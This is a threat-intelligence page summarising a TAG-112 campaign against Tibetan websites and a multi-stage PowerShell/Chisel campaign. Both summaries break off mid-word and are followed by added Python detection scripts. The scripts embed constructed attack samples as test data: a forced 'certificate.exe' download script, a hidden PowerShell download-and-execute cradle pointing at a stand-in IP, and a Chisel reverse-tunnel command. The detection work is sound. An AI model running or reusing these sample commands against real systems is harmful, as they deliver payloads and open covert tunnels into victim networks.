One Article Review

Home - The article:
Source RiskIQ
Identifier 8610692
Publication date 2024-11-13 22:41:09 (viewed: 2024-11-13 23:08:22)
Title China-Nexus TAG-112 Compromises Tibetan Websites to Distribute Cobalt Strike (Recycled)
Text
## Snapshot
In May 2024, websites tied to the Tibetan community were compromised by a suspected Chinese state-sponsored threat group tracked as TAG-112, resulting in the covert deployment of Cobalt Strike, a commercial adversary-simulation framework that is frequently misused for cyber-espionage.

## Description
According to research from Recorded Future's Insikt Group, the websites, including Tibet Post and Gyudmed Tantric University, were altered to display fake security warnings that tricked visitors into downloading malicious files. The attackers exploited vulnerabilities in Joomla, the sites' content management system, to insert malicious JavaScript. The injected script fingerprinted each visitor's operating system and browser and, for Windows users, pushed a download disguised as a "security certificate" that ultimately loaded Cobalt Strike. To conceal the origin of its operations, TAG-112 placed its infrastructure behind Cloudflare's protection services. Insikt Group's analysis linked several Cobalt Strike Beacon samples to TAG-112, and the group's infrastructure also shows a presence on servers in South Korea.

Recorded Future notes that TAG-112 appears to share connections with TAG-102, also known as Evasive Panda, another China-linked threat group with similar targeting objectives and methods. However, TAG-112's tradecraft is less sophisticated, suggesting it may be a distinct subgroup under the larger TAG-102 umbrella. According to Insikt Group, this campaign underscores longstanding Chinese intelligence objectives to monitor and suppress Tibetan organizations and other minority groups perceived as threats to the Chinese Communist Party's authority. Researchers anticipate that TAG-112, along with other Chinese threat groups, will continue targeting human rights and independence-linked organizations.

## Microsoft Analysis and Additional OSINT Context
Evasive Panda, also known as Bronze Highland, DaggerFly, and TAG-102, has been active since at least 2012. The group conducts cyber-espionage against individuals and organizations of interest to China, including government entities. According to [previous reporting from ESET](https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/), the group has been observed targeting individuals in mainland China, Hong Kong, Macao, and Nigeria. The group builds custom malware frameworks with a modular architecture in order to deploy MgBot.

## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endp
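The injected script described above fingerprints the visitor's OS and browser, shows a fake security warning and pushes an executable disguised as a certificate to Windows users. The scanner below, added here as an example and not code from Recorded Future, Microsoft or the compromised sites, checks a page's inline `<script>` blocks for exactly those traits and lists external script sources for a separate allow-list check. The regexes, weights and threshold are assumptions about the technique, not TAG-112 indicators, and both sample pages are constructed.

```python
import re

# Executable-looking extensions a "security certificate" lure might really deliver (assumption).
EXEC_EXT = r"\.(?:exe|msi|scr|hta|bat|cmd|ps1|zip|iso)\b"

# rule name -> (weight, pattern). Patterns and weights are illustrative assumptions,
# not indicators taken from the report.
RULES = {
    "fingerprints_navigator": (1, re.compile(r"navigator\.(?:userAgent|platform|appVersion)", re.I)),
    "gates_on_windows":       (1, re.compile(r"\bWin(?:dows|32|64)\b", re.I)),
    "fake_security_lure":     (2, re.compile(r"security\s+(?:warning|alert|certificate)", re.I)),
    "forced_download":        (3, re.compile(r"(?:\.href\s*=|window\.open\s*\(|\bdownload\s*=).{0,160}?" + EXEC_EXT, re.I | re.S)),
    "certificate_executable": (3, re.compile(r"cert\w*" + EXEC_EXT, re.I)),
}
FLAG_THRESHOLD = 5  # assumption: a download indicator alone (3) is not enough; it needs context

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)


def scan_page(html: str) -> dict:
    """Score the inline <script> blocks of one page and list the external ones.

    External scripts are reported but not scored: an injected loader can also be a
    <script src=...> pointing at attacker infrastructure, so they deserve a separate
    comparison against the site's known assets.
    """
    inline, external = [], []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            external.append(src.group(1))
        else:
            inline.append(body)
    code = "\n".join(inline)
    hits = {name: weight for name, (weight, rx) in RULES.items() if rx.search(code)}
    score = sum(hits.values())
    has_download = bool(hits.keys() & {"forced_download", "certificate_executable"})
    return {
        "flagged": has_download and score >= FLAG_THRESHOLD,
        "score": score,
        "hits": sorted(hits),
        "inline_scripts": len(inline),
        "external_scripts": external,
    }


# Constructed sample pages, not real site content.
INJECTED_PAGE = """<html><head><title>Site news</title>
<script src="/media/jui/js/jquery.min.js"></script>
<script>
var ua = navigator.userAgent;
if (/Windows NT/.test(ua) && !/Edge/.test(ua)) {
  alert("Security Warning: this site requires an updated security certificate.");
  var a = document.createElement("a");
  a.href = "https://cdn.update-check.test/dl/certificate.exe";
  a.download = "security_certificate.exe";
  document.body.appendChild(a); a.click();
}
</script></head><body>...</body></html>"""

CLEAN_PAGE = """<html><head><title>Site news</title>
<script src="/media/jui/js/jquery.min.js"></script>
<script>
// benign snippet: reads the UA for layout tweaks but never triggers a download
var ua = navigator.userAgent;
document.documentElement.className += /Mobile/.test(ua) ? " mobile" : " desktop";
</script></head><body>...</body></html>"""

if __name__ == "__main__":
    for label, page in (("injected", INJECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(label, scan_page(page))
```

The clean page deliberately reads `navigator.userAgent` too: fingerprinting on its own is common in legitimate code, so the verdict requires a download indicator plus supporting context rather than any single pattern. On a real Joomla site the same check belongs next to a file-integrity comparison of the template and `media/` directories against a known-good install, since the injection lives in the CMS files, not only in rendered pages.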
Rating ★★★
Tags Ransomware Malware Tool Vulnerability Threat


Reuses of the article (1):
Source RiskIQ
Identifier 8609992
Publication date 2024-11-12 19:14:23 (viewed: 2024-11-12 20:08:26)
Title Harnessing Chisel for Covert Operations: Dissecting a Multi-Stage PowerShell Campaign
Text
## Snapshot
Cyble Research and Intelligence Lab (CRIL) has uncovered a sophisticated, multi-stage malware campaign that uses PowerShell scripts to achieve stealthy persistence within targeted systems.

## Description
The attack starts with a malicious LNK (shortcut) file that triggers a PowerShell script to download additional malicious code. In the first stage, the script establishes persistence by executing secondary PowerShell scripts, which continue to communicate with the command-and-control (C&C) server. This leads to a third stage, in which the PowerShell script downloads commands from the C&C server to perform various malicious tasks, such as data exfiltration.

Infrastructure analysis reveals that the threat actors leverage Chisel, an open-source TCP/UDP tunneling tool that carries its traffic over HTTP, allowing them to bypass network defenses and move laterally within the compromised network. The attackers also route communications through a Netskope proxy to obscure them, further enhancing their stealth. Chisel gives the attackers access to internal networks and lets them carry out activities such as scanning the internal network or enabling isolated systems to download additional payloads, making this campaign highly evasive. According to CRIL, the campaign is highly organized and possibly financially motivated, using advanced techniques to evade detection and maintain long-term control over infected systems.

## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint.
- Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem) LSA protection.

## Detections/Hunting Queries
### Microsoft Defender Antivirus
Microsoft Defender Antivirus detects threat components as the following malware:
- [PUA:Win32/Puwaders](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=PUA:Win32/Puwaders.C!ml)

## References
[Harnessing Chisel for Covert Operations: Dissecting a Multi-Stage PowerShell Campaig](https://cyble.com/blog/dissecting-a-multi-stag
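The chain described above (LNK file, hidden PowerShell stager, secondary PowerShell scripts, then a Chisel reverse tunnel) leaves a recognisable trail in process-creation telemetry. The hunt below is an added example, not code from CRIL, Cyble or Microsoft: it scores PowerShell command lines for stager traits, matches Chisel's public client argument grammar (`client <server> R:socks` / `R:<port>:<host>:<port>`) rather than the binary name so a renamed copy is still caught, and walks parent links to reconstruct the chain behind each alert. The events are constructed Sysmon-style records, the alert thresholds are assumptions, and the explorer.exe parent heuristic is an assumption about how a double-clicked LNK launches its target.

```python
import re

PS_IMAGE = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.I)
# Command-line traits of a PowerShell stager; the alert threshold below is an assumption.
PS_INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|\bIEX\b|Invoke-Expression", re.I),
    "policy_bypass":   re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
}
# Chisel's public client syntax: "client <server[:port]> R:socks | R:<port>:socks | R:<port>:<host>:<port>",
# i.e. a reverse tunnel that lets the server reach into the client's network. Matching the
# argument grammar instead of the file name survives a renamed binary.
CHISEL_CLIENT = re.compile(r"\bclient\s+(?:https?://)?[\w.\-]+(?::\d+)?\s+R:(?:\d+:)?(?:socks\b|[\w.\-]+:\d+)", re.I)
CHISEL_SERVER = re.compile(r"\bserver\b.*--reverse|--socks5\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def chain(pid: int, index: dict) -> list:
    """Walk ParentProcessId links upward; return image basenames root-first."""
    names, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        names.append(basename(index[pid]["image"]))
        pid = index[pid]["ppid"]
    return names[::-1]


def classify(event: dict, index: dict):
    """Return (rule, indicators) when an event matches a hunt rule, else None."""
    cmd = event["cmdline"]
    if CHISEL_CLIENT.search(cmd) or CHISEL_SERVER.search(cmd):
        return "chisel_tunnel", ["chisel_cli_syntax"]
    if PS_IMAGE.search(event["image"]):
        hits = [name for name, rx in PS_INDICATORS.items() if rx.search(cmd)]
        parent = index.get(event["ppid"], {}).get("image", "")
        # Heuristic (assumption): a double-clicked LNK starts its target under explorer.exe.
        if basename(parent) == "explorer.exe":
            hits.append("launched_from_explorer")
        if len(hits) >= 2:  # assumption: one trait alone is too noisy given admin scripting
            return "powershell_stager", hits
    return None


def hunt(events: list) -> list:
    """Run every event through classify() and attach the process chain to each alert."""
    index = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        verdict = classify(e, index)
        if verdict:
            rule, hits = verdict
            alerts.append({"pid": e["pid"], "rule": rule, "indicators": hits,
                           "chain": chain(e["pid"], index)})
    return alerts


# Constructed Sysmon-style process-creation events (not real telemetry); 203.0.113.0/24 is a
# documentation range and the stage-2 base64 blob is filler.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"pid": 900,  "ppid": 4,    "image": r"C:\Windows\System32\services.exe", "cmdline": "services.exe"},
    {"pid": 4012, "ppid": 1120, "image": r"C:\Windows\explorer.exe",          "cmdline": "explorer.exe"},
    {"pid": 5224, "ppid": 4012, "image": PS,  # stage 1: LNK target, hidden download cradle
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX((New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.5/stage1.ps1'))\""},
    {"pid": 5300, "ppid": 5224, "image": PS,  # stage 2: encoded persistence script
     "cmdline": "powershell.exe -w hidden -enc " + "Q" * 48},
    {"pid": 5388, "ppid": 5300, "image": r"C:\Users\Public\Libraries\svc.exe",  # renamed chisel
     "cmdline": "svc.exe client http://203.0.113.5:8080 R:socks"},
    {"pid": 6000, "ppid": 900,  "image": PS,  # legitimate-looking admin task: bypass flag only
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Inventory\collect.ps1"},
]

if __name__ == "__main__":
    for alert in hunt(EVENTS):
        print(alert["rule"], alert["pid"], alert["indicators"], " -> ".join(alert["chain"]))
```

The benign event with only `-ExecutionPolicy Bypass` stays below the threshold, which is the point of scoring traits rather than alerting on any one of them. The Chisel match is on the `R:` reverse-remote grammar, the shape an operator needs to pivot from the C&C server into the victim network; a renamed client such as `svc.exe` above is still flagged, and the reconstructed chain shows it descending from the explorer-launched stager.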
Rating ★★★
Tags Malware Tool Threat


The article does not appear to have been reused from a previous one.